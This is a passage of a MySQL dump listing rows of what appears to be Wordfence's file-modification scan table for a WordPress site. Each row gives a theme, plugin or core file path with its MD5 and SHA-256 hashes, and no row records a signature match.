(0x83461a2b3f83727eb8eaaf08a4833621, 'wp-content/themes/Impreza/searchform.php', 0, 0xd57ecaebc898719d87526a11eb2f0488, 0xd57ecaebc898719d87526a11eb2f0488, 0xd6063edbc76449c561b30d1b12f0af439fb1751650409f6da672b9467fd07837, '', 0, '?'),
(0x835b16e73ee15c252fde58acdfa890ff, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/laptop-envelope.svg', 0, 0x4082917af50b885d44d5f46f362c3890, 0x4082917af50b885d44d5f46f362c3890, 0xd67b54b08b2a9ceb8b880d6e24c0f6e362e18877cc6b8ce6772382c5aa29d926, '', 0, '?'),
(0x836608b857181052b5ab1bfa2bcb9f6b, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_progbar.php', 0, 0x44f39eb00fc90f2957066089d892e69a, 0x44f39eb00fc90f2957066089d892e69a, 0x3e3167a473b4d24f19076c6922c13ac6937651bc28212257b5bc42c434e6ae17, '', 0, '?'),
(0x836d3eecbb0006bbb0305826a05e9951, 'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php', 1, 0x00000000000000000000000000000000, 0xb7e7704b7a92e40360df29395f4008a0, 0xbb9b61d2935965da71d9371c59546318b3c88a69249857bfd8aaca2fc421872c, '', 0, '?'),
(0x836ee456ee6a7ca2c37c8c6e3b895cf2, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user04.svg', 0, 0xe825948b6eb030ff1ff4e36db0741846, 0xe825948b6eb030ff1ff4e36db0741846, 0xd88a832c4fd5215a662b5136b2dc57dd4ae98fc7294658a75003ac169ff20276, '', 0, '?'),
(0x8376ae0cb5098a3c04e9eef95af65d71, 'wp-content/plugins/js_composer/include/params/vc_grid_item/templates.php', 0, 0xd89a239b8ed5139f546df42c02939a3b, 0xd89a239b8ed5139f546df42c02939a3b, 0x52fc931e8937f33eb2cc8d03bd6f1f8c3250cf29a2797a854be4fac8fa681f7e, '', 0, '?'),
(0x83947e764aa5d8d05703686a8ab51b84, 'wp-content/themes/Impreza/framework/plugins-support/codelights.php', 0, 0x9eab54fe3a66aabbb1a888060fa5219c, 0x9eab54fe3a66aabbb1a888060fa5219c, 0x6117c540b2e97311b44dda04adfa225f9b109e0d384dc31ff881dce2d573a05d, '', 0, '?'),
(0x83a0cbaabac8188bdc9abc1b23cd41ec, 'wp-content/plugins/js_composer/include/classes/editors/class-vc-frontend-editor.php', 0, 0x1c8c5d16e40a00601824188303b43bea, 0x1c8c5d16e40a00601824188303b43bea, 0x4dbc2aa1710cb4b502c879d8d054ce73f15268f01252cc1036d26418ec15f7a0, '', 0, '?'),
(0x83a83f08e70eacda7a36a497db61447a, 'wp-content/plugins/wordfence/images/loading.gif', 1, 0x00000000000000000000000000000000, 0x4b3afb84b2b71ef56df09997a350bd04, 0x6a2ae4658ef308a9f5646f0658a47ea737c2eb2680b2824efc39c97c4c9d95c7, '', 0, '?'),
(0x83a910e8b606cb415115680d22d89e98, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_panorama_horizontal_24px.svg', 0, 0x64b6fac52e633e985908f1c567df447b, 0x64b6fac52e633e985908f1c567df447b, 0x117c94fefb85172c4ffbd741170bc56fe17caee7652a2b5fac2204f1f65f5d30, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x83c319092e606018486a658422d67481, 'wp-content/plugins/Ultimate_VC_Addons/woocomposer/woocomposer.php', 0, 0xa943cb3a54fb6cd645473f128571bdf1, 0xa943cb3a54fb6cd645473f128571bdf1, 0x6ea5658560649dd48f0b87e7ea29713eb1a3b42faa9c6da77f600623958f00dc, '', 0, '?'),
(0x83d0b82b3a33e8586e4e88746578f658, 'wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff', 1, 0x00000000000000000000000000000000, 0xa5d401f5ecd87b57fc3705683e97adaf, 0x8409326d98e87787f3338d297a57670b91de767b410302668ae001487560436f, '', 0, '?'),
(0x83d52160b9f049e833897b80941fc7d5, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg', 0, 0xce1003c3cdf2d5ab91720129beb8860b, 0xce1003c3cdf2d5ab91720129beb8860b, 0xf7c1f4cb5e5ed5827b3b4fd59dae748448fd6242b5aa424ffca85d55a7c40a76, '', 0, '?'),
(0x83dddb1271366284967236c5e02ae0db, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/hourglass.svg', 0, 0x14a7497171ece13f3208532b891e631d, 0x14a7497171ece13f3208532b891e631d, 0xc5da0140f469a93f14e5f9b8579768d3736c4d1c27e1d1a95b99ba983ad03290, '', 0, '?'),
(0x83e2e8ca86d7e9906ea544e3ae96cb28, 'wp-admin/css/install.min.css', 1, 0x00000000000000000000000000000000, 0xc1896d0a1d14cd707999a253d37ecc5f, 0x008878bbbb2f97b50c8c2f92063749d4fa3ee0c76bf535e92aa43e49111d4fcf, '', 0, '?'),
(0x83e36aacba0cd3c31335b2de66c56aa1, 'wp-content/plugins/wordfence/views/tools/options-group-live-traffic.php', 1, 0x00000000000000000000000000000000, 0xa5355f2b14a1a91cb5c716c3cd450547, 0xe6f3737d520b427c4b03b604a47a4984f9c9f2115b0ba7590fdb29127290bcea, '', 0, '?'),
(0x83eb1dc6c1e86d3b67e98978e1b24916, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/preson-chart02.svg', 0, 0x904edd143a79a9bd9a29828f15abbcdf, 0x904edd143a79a9bd9a29828f15abbcdf, 0x78e121b89ca23484bc2fb29e9265f92ecdb181f47646b76aa42c446fc757818d, '', 0, '?'),
(0x83f2624942208a85a7736bd49ca10ef8, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/folder-add.svg', 0, 0x28acc841d0a9809be14699f631fab2af, 0x28acc841d0a9809be14699f631fab2af, 0x6f3d64fd5ca53b7aa71b4e206ca8d2ab95e34429523057673219c2a61a9e25c6, '', 0, '?'),
(0x83f766a04eca649aa9b48f814cfafe01, 'wp-content/plugins/wordfence/lib/cronview.php', 1, 0x00000000000000000000000000000000, 0xda659828aeb8d474406e1b807212a4c3, 0x030298865a079e342ce3687a3d3e4d9a7dd607472f5bcc30cf6c11f822ab694b, '', 0, '?'),
(0x84093eddab0b841158bf41c01064f451, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_list_numbered_24px.svg', 0, 0x625110773ac48054581fd7b8d0023798, 0x625110773ac48054581fd7b8d0023798, 0x87f307bab6b4165c4dae0aa9040acf78d1c54ea6b2d52640e3b87de237f1fa93, '', 0, '?'),
(0x84124082614859044b06f0c55355d43b, 'wp-content/plugins/js_composer/include/classes/settings/automapper/class-vc-automapper.php', 0, 0xa1000701c97f3fee3468aad3205d9fef, 0xa1000701c97f3fee3468aad3205d9fef, 0xb4ddb4c32d2193af184cd29a871376b301ec9d3a8ca7f7f93b12bf2f53b8fc55, '', 0, '?'),
(0x84256e1a73b6ae3aef8e0654c2030270, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/tabs.min.js', 0, 0xff470c9aa20541a03f5a9d6fd74da6e1, 0xff470c9aa20541a03f5a9d6fd74da6e1, 0x68ac78856c87457bb8fc16de3d6977bf657e5f683589a26ef3038af0184c67d3, '', 0, '?'),
(0x8429c5a9b6ea85325ba409d334a85f61, 'wp-includes/class-walker-category-dropdown.php', 1, 0x00000000000000000000000000000000, 0x03f1979261702de0af3683863f21b347, 0x0f0b802b5f9ba117b6305e25931f3282a6d0071e900a1b207baf238629268177, '', 0, '?'),
(0x843a7f2b5bf5b967bea6435addd8f392, 'wp-includes/template-loader.php', 1, 0x00000000000000000000000000000000, 0x08f7137790a06aa6fcdd4a5eab13c5d3, 0x144d1433b61514c61813111e38b156591a6c1c4473842ce30f097319a89ebbcd, '', 0, '?'),
(0x844800bee3e27fb1348d159a44266ee7, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_print_24px.svg', 0, 0xde293e30880ad1028f471a987251da46, 0xde293e30880ad1028f471a987251da46, 0x875dafa88d81d2249f7003f57a3a279043e052908900731279da4c39d71c233f, '', 0, '?'),
(0x844d290a89248e2844670b40733077dc, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_https_24px.svg', 0, 0x07af44f83fbc2d1b5f1ef3587552f314, 0x07af44f83fbc2d1b5f1ef3587552f314, 0x2785dc80f765270e06b3360419f768f097d700f1d256b8740617a498c42a4898, '', 0, '?'),
(0x846a49f558103ccc52e265b5b71bd499, 'wp-content/plugins/revslider/public/assets/assets/svg/av/ic_subtitles_24px.svg', 0, 0x74107116021560a56723b1a088119ed3, 0x74107116021560a56723b1a088119ed3, 0xc3e5b5bea8704276f879f56bbd20b774771c38b89a20c599f68dce9ebc5b3936, '', 0, '?'),
(0x8471e67cb7210cb4bbe71f9a5c52784f, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_do_not_disturb_alt_24px.svg', 0, 0x3097fa29ce75fd29b46d8ff90f8d05b9, 0x3097fa29ce75fd29b46d8ff90f8d05b9, 0xc8687aea3f17d4eb94a1733ba3dc12f2f231f1ad57106b0b22044485b6cd9fc8, '', 0, '?'),
(0x8480ab69bcf20ab43d91d12bce69b7ca, 'wp-content/plugins/revslider/includes/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x849c1b8250bbbcdd4d85cb9d883d0455, 'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php', 1, 0x00000000000000000000000000000000, 0x1772611c5827c9e17a00352b9322a837, 0x76ef24aa72b15f0e73af047902f3b00759a1c8f913c218557bd8983f9913b143, '', 0, '?'),
(0x84a81d66df24e5351b7376ab8f985332, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_credit_card_24px.svg', 0, 0x7a95477d03857d2c2d331b1b1514e558, 0x7a95477d03857d2c2d331b1b1514e558, 0xfa5d7c9dbb1fa1b363c6880a5c1bae07de8770d3a7b99521cebe9d07800bc01a, '', 0, '?'),
(0x84b08e0c65d9139e182d051c0ab67956, 'wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php', 1, 0x00000000000000000000000000000000, 0x8d10a9897cae57779a623e45cff2794a, 0x8227c0b28eafad7ec03610c89d0a11428abac26167c2907af9c1eb64c3eb5119, '', 0, '?'),
(0x84bb6ea3a7999f489dc9bedeaccda7f0, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_launch_24px.svg', 0, 0xf9202f14af450270916e7b972de89521, 0xf9202f14af450270916e7b972de89521, 0x483b00eb03f41a0163b3b38f5eb8172a27849025d872c1b2a4ad4ed6123dbfd2, '', 0, '?'),
(0x84c0ca0fc6c4d55055a1851e616397d3, 'wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php', 1, 0x00000000000000000000000000000000, 0xb3594192c047023d62d17512a11694f7, 0x7af12ccda5b2e8e07403093c7b40597b04fa697983ac73988add63a22853fd4c, '', 0, '?'),
(0x84c4abb182a14111d6ed0afc44ee34c1, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_timer_10_24px.svg', 0, 0x762d2f837bb5f81ba07b7addcb9c9c0d, 0x762d2f837bb5f81ba07b7addcb9c9c0d, 0x028e8026d2012ed530e0435d181d9ebfc147118b55a9b8471cba20e89b75600e, '', 0, '?'),
(0x84d66e76fb9f5af9591e56dffb1fc9fe, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php', 1, 0x00000000000000000000000000000000, 0x0ce1a9ef60bc49a6f42c427ad7e631b1, 0xb551a801a33532bea83c6969bfe34e941bd5c0c20fd0ee4b4fe3c3d6623264dd, '', 0, '?'),
(0x84d862c7c2b502c73cd01dd2245614df, 'wp-content/plugins/js_composer/config/content/shortcode-vc-hoverbox.php', 0, 0xfaf098e517c142a22c5ab08f5d464da9, 0xfaf098e517c142a22c5ab08f5d464da9, 0x11ec8259ae1952fc65d361a7e8cbb7754b126a88c72c901e44bef46aa7389ad8, '', 0, '?'),
(0x84f186ea6c890436f2f995f97a8b9c5a, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/people-structure03.svg', 0, 0x4334854931c9a1dd46b654ba27ca5346, 0x4334854931c9a1dd46b654ba27ca5346, 0xe63929c53c3bc7b5246340a5b6e14b6cad638665bc7567c50525581a8f40471a, '', 0, '?'),
(0x850137f5da07cc89c05a7f55d39973d3, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/hotspot-tooltipster.min.js', 0, 0x93c2aac4a4a89eec496860c8f45d040b, 0x93c2aac4a4a89eec496860c8f45d040b, 0xfdbe68eec0c14e4b1fd272769220aef3b6a3df66b380957d8d7797b631aab592, '', 0, '?'),
(0x8508045ac4db449f9b6cb33db8ecbbab, 'wp-content/plugins/wordfence/views/waf/waf-install.php', 1, 0x00000000000000000000000000000000, 0x19a55d1163ed455e87474d531666b9ef, 0x065c482e0b0e543a0ec48fc96791fd5d427ccd8cd7cd7c7b173de8ab0170c7b5, '', 0, '?'),
(0x851784e40cc9db7587ab011f78dd402f, 'wp-content/plugins/js_composer/include/classes/editors/popups/class-vc-shortcode-edit-form.php', 0, 0xb2e2e43b41aa644e4d3b9bac0b00b24f, 0xb2e2e43b41aa644e4d3b9bac0b00b24f, 0xb9a3a8bb6b4cb99e87692439bf15f1a96077480ba34fbaa69d2486796e85c33d, '', 0, '?'),
(0x851f8f8cb592cce9285354836668c718, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/dual-button.min.js', 0, 0xa212ac19d27b4ea07dc63780c6a679d7, 0xa212ac19d27b4ea07dc63780c6a679d7, 0x233a912b0f364615c6dfa8676a90149699c63c37b97b3053cef3568768c8b6d5, '', 0, '?'),
(0x85317e9c3ca724a65518eea38348fa6f, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_info_box.php', 0, 0x922da9461324f630446fc47f42bef143, 0x922da9461324f630446fc47f42bef143, 0xd369fc6aaf9e909cec4afcde440e77aa78ac735ff237a484bcfe1f07476d3195, '', 0, '?'),
(0x8531f460cbcd428492cfc2a15df28373, 'wp-includes/css/dist/editor/editor-styles.min.css', 1, 0x00000000000000000000000000000000, 0x4a98fa4de2c4af7e9ecfedfde88e80a1, 0x87ca753bb05644eb99cec1636d5748ecb6ee1dd1c9d2274b07fa10671152fc0a, '', 0, '?'),
(0x8535f11316212bd2e54b9bfd301fa7f5, 'wp-content/themes/Impreza/framework/templates/header.php', 0, 0xeac2b11dadca1a5707364448d6f9fd60, 0xeac2b11dadca1a5707364448d6f9fd60, 0x54f1791c09f0fbd39952ebf583d353d5a80cf18d6fae182330e413f7fe0198f6, '', 0, '?'),
(0x8542257636cd49224a62bdc734d3a154, 'wp-admin/link-manager.php', 1, 0x00000000000000000000000000000000, 0xebc436aba166ed11cead793b9ccbb0ed, 0x1f598523748e3e2c88c2754f56daacf418e05cc91928316f7c750549c76336b2, '', 0, '?'),
(0x8545444f75eb4bed295cf2ee479d5388, 'wp-content/plugins/js_composer/include/params/google_fonts/google_fonts.php', 0, 0x03889b2a01217dfd6641560940822c6a, 0x03889b2a01217dfd6641560940822c6a, 0x4cb6e99e34460503718e92fa606635b3e480cca200180efc112819dfcfa63be9, '', 0, '?'),
(0x8557a09569011b547322dfecd6b6cc94, 'wp-content/themes/Impreza/framework/templates/single.php', 0, 0x89d6fc71e7b06609d17b7069ee3c6fa7, 0x89d6fc71e7b06609d17b7069ee3c6fa7, 0xf72fde763c25646218c172e366ea8b6298b3e253d568daf52280bd92f2bd46db, '', 0, '?'),
(0x85a058d0a8325cc8e727c1b0cfe40ebd, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/vc_column.js', 0, 0x3d440b85f158d6f4f249f784fbed67c7, 0x3d440b85f158d6f4f249f784fbed67c7, 0xef251f04aa54583c0af66d9798f05e41de802711395dc213a910a8ada45009d6, '', 0, '?'),
(0x85a2a75af323f68bfa906fd1395f14ff, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_personal_video_24px.svg', 0, 0x074bee687d651eaee63b67c4b2f37755, 0x074bee687d651eaee63b67c4b2f37755, 0x1f3f647a0f321060809f7e7680db071a51318fe0d8ae7f862ad294ddc7718164, '', 0, '?'),
(0x85b93ec141e40c42c737e5537a218865, 'wp-admin/includes/export.php', 1, 0x00000000000000000000000000000000, 0x25bb9f88a2e60b7b7144025b215e6bdc, 0xf4a8be067daa36b0f5f66caecfa041ce5d0ac8c2028d1c254972d64268ec0e89, '', 0, '?'),
(0x85cbf86f1477836c4cb84b0f873fa4ed, 'wp-content/plugins/revslider/admin/views/global-settings.php', 0, 0x9fc46d7fe4d57b74f34811703042e4c0, 0x9fc46d7fe4d57b74f34811703042e4c0, 0xd271a4e589fe275322c755783ecac31031cf7c82e60be09db10a664a395a6c2f, '', 0, '?'),
(0x85ec037c30b9afd24fec2b985d6c55f5, 'wp-includes/js/dist/a11y.min.js', 1, 0x00000000000000000000000000000000, 0x8b973a699296092e4a14ee6c0ce90cbd, 0xd8f3f86d56062b98444591557a91e555fd3c935d764b4774d0cb10f1de63e736, '', 0, '?'),
(0x85fd1e9b0e54d7ec9691b53a745ba6df, 'wp-includes/Requests/Exception/HTTP/410.php', 1, 0x00000000000000000000000000000000, 0x71be4f3437dfbadda52f38582184e19b, 0x97a53986662f334d4d3b1b2347daaa574f26927453fb4f1a1db1adc018c698f2, '', 0, '?'),
(0x862981c0d2e25968a82ef23bbce8c5a1, 'wp-includes/Requests/Exception/HTTP/412.php', 1, 0x00000000000000000000000000000000, 0x25b88449dcb7a1a83dd906378aa556c7, 0x53f741953463185c44d235362d8acd23bcbe642ab39fd2d2bdd3be8f52fdfe86, '', 0, '?'),
(0x8631e4886555fc9d4d56fdb85e9a1499, 'wp-admin/includes/misc.php', 1, 0x00000000000000000000000000000000, 0xbb0aca91159a92f02519c12327b416e0, 0x28f7fb2fe1521fc17201624ac5ee5836fdbfbdb68ec80d334da26c5d66f28898, '', 0, '?'),
(0x8640252a4f748e9b8e8987220db25fc6, 'wp-content/plugins/wordfence/modules/login-security/js/login.1579191227.js', 1, 0x00000000000000000000000000000000, 0xe07e17569bf818ae1510746acf3a9ff5, 0x2ec40b79bf40d34976651a07fd3f67c764b98df0c768e44fc7e0fdb0a1ecf000, '', 0, '?'),
(0x86465f71a1c3c8438a46216f3470b797, 'wp-content/plugins/wordfence/views/scanner/scan-starter.php', 1, 0x00000000000000000000000000000000, 0x4513a88e12f820c1936006627b7b760d, 0x7146a4ff8b78d002efe26754415d9ca6f44d86ad6b035ea8e21f3ec7275542e2, '', 0, '?'),
(0x86806e73d80ad36c47b2538c7d35b264, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-flickr.svg', 0, 0x5bdce7cd3c6eaa99a3212b73475a5336, 0x5bdce7cd3c6eaa99a3212b73475a5336, 0xfc93010b764dd238f1aebed7903dae494ccac8331ed8ce21d5507d6ef963ab83, '', 0, '?'),
(0x86854104cd90a2b421d93b0ad519ac92, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_question_answer_24px.svg', 0, 0xa323b6355c23b5a3ab8e4e8a9aef08c5, 0xa323b6355c23b5a3ab8e4e8a9aef08c5, 0x14fd16ef174846bf533a7fd83917fb937a021cd3a35eb1035d0ac0c2e0b6fc14, '', 0, '?'),
(0x869f00a63e23198a05d1049be1ad7a28, 'wp-includes/bookmark.php', 1, 0x00000000000000000000000000000000, 0x767b3e54ef8f86b938b7b449e71616ed, 0xc4353b4ad800f21a99072f88f7db3458f17e9a713595db7c420e7c984cb9d063, '', 0, '?'),
(0x86a6d9227ca5b656c9ce95d8967d5ac9, 'wp-content/plugins/js_composer/config/buttons/shortcode-vc-cta.php', 0, 0x28d7e035232aabc9cc1d015c48fe3cfa, 0x28d7e035232aabc9cc1d015c48fe3cfa, 0x6198b33280db3bb153baa1e78e4dfd4933ba6ff8b22b3e4199f2cb461bbd6388, '', 0, '?'),
(0x86a889a563c9ba1f1a76e8158edf95a3, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-hover-box.svg', 0, 0x6ca72001e5260fd06fbb14c2de42aea9, 0x6ca72001e5260fd06fbb14c2de42aea9, 0x8fd6074ccd8f170e3d8c87a0d641ba03997f85a2b734c5906bf2187c9e80629a, '', 0, '?'),
(0x86acb42ad712655aa66bfe56b7dec97b, 'wp-content/plugins/revslider/public/assets/assets/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x86b297197552fb7b92f39cf72fe6811e, 'wp-content/themes/Impreza/framework/shortcodes/vc_wp_custommenu.php', 0, 0x93eb624087f213f70054e41b63d4ad25, 0x93eb624087f213f70054e41b63d4ad25, 0x98ade0396e7d790893b1bf6ea3c439e256fe09d45093190ca9eec289f436876e, '', 0, '?'),
(0x86b311ac17ba12c3ea1982e2eb7d95cd, 'wp-admin/media-upload.php', 1, 0x00000000000000000000000000000000, 0x61f4f226bb859ce51ab7f5e75b9fac50, 0xa4e6e5dbe0084caeef3ffdaa767ac8a25d1127b6c9070980bda116b89b76285a, '', 0, '?'),
(0x86ba7a4ec4be621b7b67651e6c1eff3e, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/head-question.svg', 0, 0x8d7653919580941a7ad5ffcd1adce887, 0x8d7653919580941a7ad5ffcd1adce887, 0xd58e15b0c7f68d32b99658abb7eb9b7f09775bfc66b5eec9fe937f7ad98d7d0c, '', 0, '?'),
(0x86bba8f018a4855a785ab0fe2d6ca03f, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_rate_review_24px.svg', 0, 0x4dfe623af968d81e87fb7e7d2a5c5974, 0x4dfe623af968d81e87fb7e7d2a5c5974, 0x18924b6c4f6fcca05988c7aef6634b1742795d33bf8abca7be39e89f0b10e687, '', 0, '?'),
(0x86c42edcd9de2baf224b9801093db93b, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/textarea.php', 0, 0x7ae01230f108eb52d52ca1e188811d22, 0x7ae01230f108eb52d52ca1e188811d22, 0x4cbf6a5e8c1b95db84ac467ecd570a50a3729e53a85fa3b58209152c4ef60838, '', 0, '?'),
(0x86ca3a9997610b15ff18c5b0a3c9c739, 'wp-content/themes/Impreza/framework/plugins-support/js_composer/map/us_counter.php', 0, 0xf9a3549be9c46ecec1080986d1f5b047, 0xf9a3549be9c46ecec1080986d1f5b047, 0xa01d74b3505677a731a346cd979d904c06e88b22261670df4cd45a83c652de1e, '', 0, '?'),
(0x86caa69e75f7ff8453b00780471f2842, 'wp-content/plugins/revslider/public/assets/assets/svg/social/ic_group_24px.svg', 0, 0xe64c84eb627368e50fe68547896eb720, 0xe64c84eb627368e50fe68547896eb720, 0x5065855bc9fd0c46fc82b8799aa611c5c69f131215df1cdd3656f60b5177575e, '', 0, '?'),
(0x86d92169cc425cb6efa5ad123cb6afd0, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/tablet-chart3.svg', 0, 0x6c43bea279a7a72f79b8afc0798a9151, 0x6c43bea279a7a72f79b8afc0798a9151, 0x9bc4e65203cb1144e2d58ce467641594b59838568f4fa8245fb2d5e204b0a96b, '', 0, '?'),
(0x86daae258a918b22d4ea126c79c3d30d, 'wp-content/plugins/Ultimate_VC_Addons/templates/info-tables/info-table-design06.php', 0, 0x68ac559d91cd613423cd2d3197cc9055, 0x68ac559d91cd613423cd2d3197cc9055, 0x59dd3dc455538c599266077b8c8b9f43efb5fec596cbe08b7df7866c7d68074d, '', 0, '?'),
(0x86dec45939fc2fc6d3f9a4597ec080cc, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_left_24px.svg', 0, 0x76a125d17f5f918c8ef2a7fcee736b56, 0x76a125d17f5f918c8ef2a7fcee736b56, 0x864fd8c13e33c0ef594a2fbc504002b656795dea05b5021e8901925d7ee42e24, '', 0, '?'),
(0x86e08d070f1a47df74040150f0863bcc, 'wp-content/plugins/Ultimate_VC_Addons/admin/vc_extend/js/vc-box-shadow-param.js', 0, 0xb86a32ede1996445ae1fc7054ff5e862, 0xb86a32ede1996445ae1fc7054ff5e862, 0xfa088bb5279910362332e0791508ac3bfb320257224a633bc5806da8e2970825, '', 0, '?'),
(0x870b45369f2d6f5efce249203618f1d6, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_section.php', 0, 0x876bdf847b3de1616a2316ae3f54d29d, 0x876bdf847b3de1616a2316ae3f54d29d, 0x7a08c9d4123f13cef2d5b2470327178f32eccadcf2f33df36e0870538b4383f5, '', 0, '?'),
(0x87171681f2509377aaa98d30e268ff39, 'wp-includes/js/tinymce/plugins/fullscreen/plugin.js', 1, 0x00000000000000000000000000000000, 0x591f9bbbaefec332c4b00d6d7d25a1c0, 0x33cbee5d2ed04243421965fdf4caa2d253e18828203fc05a7b18ef93c9f0baf2, '', 0, '?'),
(0x872bf3dc61af49aa6f3dd14b5d916c51, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_receipt_24px.svg', 0, 0x405f2285716e257fffe8dd0023263070, 0x405f2285716e257fffe8dd0023263070, 0xfb6828be35aafb0dada319aa5e1085ed0658cca68f34d2feedfe9fdc465243b2, '', 0, '?'),
(0x872fea02237f5e2f0a23c87eee75f7dc, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_texture_24px.svg', 0, 0x20b4612f12b50e3aa3167efe29491858, 0x20b4612f12b50e3aa3167efe29491858, 0x821449de3b2c2ce244e1cadb0ca3e71c67151cd65d442e1530d6c9f50d39e762, '', 0, '?'),
(0x8737f18668eba65f0806eb7965aee4a3, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_ethernet_24px.svg', 0, 0xf5be410022be7a3f629342f7c0bc92f4, 0xf5be410022be7a3f629342f7c0bc92f4, 0x08a0b4eaeaa196701e22a32193a031d4fcf6b407392aab81bfa3b94e4cbef560, '', 0, '?'),
(0x873ab27c5848b5df005cbe49f1a96c27, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/drawer.svg', 0, 0x3b79063c3226352678fdf15d063433fc, 0x3b79063c3226352678fdf15d063433fc, 0x0a47470f1b974f04719e4346cb0571b487ff59f9356b7ca1de6e570652551b4a, '', 0, '?'),
(0x873b6a8ca77cfd3a1c1b05312fc7e6a3, 'wp-admin/site-health-info.php', 1, 0x00000000000000000000000000000000, 0x623327d37a9ea47a9b8901b717946e69, 0x7d324242894eef2a04a39d00c9f4c1622bef1f102879a815a088ed67ac0b5631, '', 0, '?'),
(0x87422079d6777f862bb3e0d67c74abcb, 'wp-includes/class-wp-http-requests-response.php', 1, 0x00000000000000000000000000000000, 0xda4fbb54505e95f397726262211464dc, 0x801adecede5bd0a9c7a9a97b53112e57733a8c9cdc65d71eae2219237a9d5b4e, '', 0, '?'),
(0x8749883d0179840b50dac7131a4d62ad, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Number.php', 0, 0x6f223021c3a9cf6c666645e847ac6147, 0x6f223021c3a9cf6c666645e847ac6147, 0xf93d9294df811e9ac7081de6eaffbcb4d634331d44f8e954777be085e6cfd628, '', 0, '?'),
(0x874abc26065f23b9f13353d471a08dad, 'wp-admin/images/spinner-2x.gif', 1, 0x00000000000000000000000000000000, 0x31fd991e90e6329d865e23e638b50ff4, 0xa0efaf08182396cb92cc3d2402630ea9a736c0dee418d2df09429d9934078136, '', 0, '?'),
(0x87562b40ff3081f10efc70b8c98f6869, 'wp-includes/rest-api/class-wp-rest-response.php', 1, 0x00000000000000000000000000000000, 0x3e9a88ceca33e6af668785dd6a0342b8, 0x8cd48cc927f2a3ec4d1453678ccfbe01be2ac3b12f8d7bc890a90b6eac444123, '', 0, '?'),
(0x875a9081d9295f84da77e42724a558f9, 'wp-includes/class-wp-block-parser.php', 1, 0x00000000000000000000000000000000, 0x054c1d78d3e704158ed348fa2cf3d2f7, 0xb690ae52bfc29c3ee46fa4d2b180d002e58ddb7ac7065c398e1e09f6f956bcc3, '', 0, '?'),
(0x875e53785f3f03758b1d47ca44a9e4eb, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php', 1, 0x00000000000000000000000000000000, 0x94cf48d964393c43f0cba4ab9ad1626c, 0x4bcf2e426facb0dfd8e0a3b8830776fc886298258598e0d5537e31f94be0c317, '', 0, '?'),
(0x87627e35c3611f1ff99aa04940292af1, 'wp-includes/class-wp-site.php', 1, 0x00000000000000000000000000000000, 0xdf11790016e68914247eaca6610861d7, 0xded59a3d0270bf1ab3792aa62765b9d1203c6b4aef28434a00a9250089e84665, '', 0, '?'),
(0x8766473cae40e19f9d4efbe71cb5132d, 'wp-admin/includes/class-wp-privacy-requests-table.php', 1, 0x00000000000000000000000000000000, 0x4627f19994f3312aeecfd0d9558d7d23, 0x5bbf6458b47c4816192f2ce9e9f85483781f96166de41ae7ce793ce726c4172b, '', 0, '?'),
(0x87783970e332ac02c5f077e303b8c442, 'wp-includes/ms-network.php', 1, 0x00000000000000000000000000000000, 0x1c63bae6011ea1b3999dfba589be0351, 0x7fc1fde78a0f1cd64c8208da40fd77ecf26d6d9aef96d33ec81307a813b96505, '', 0, '?'),
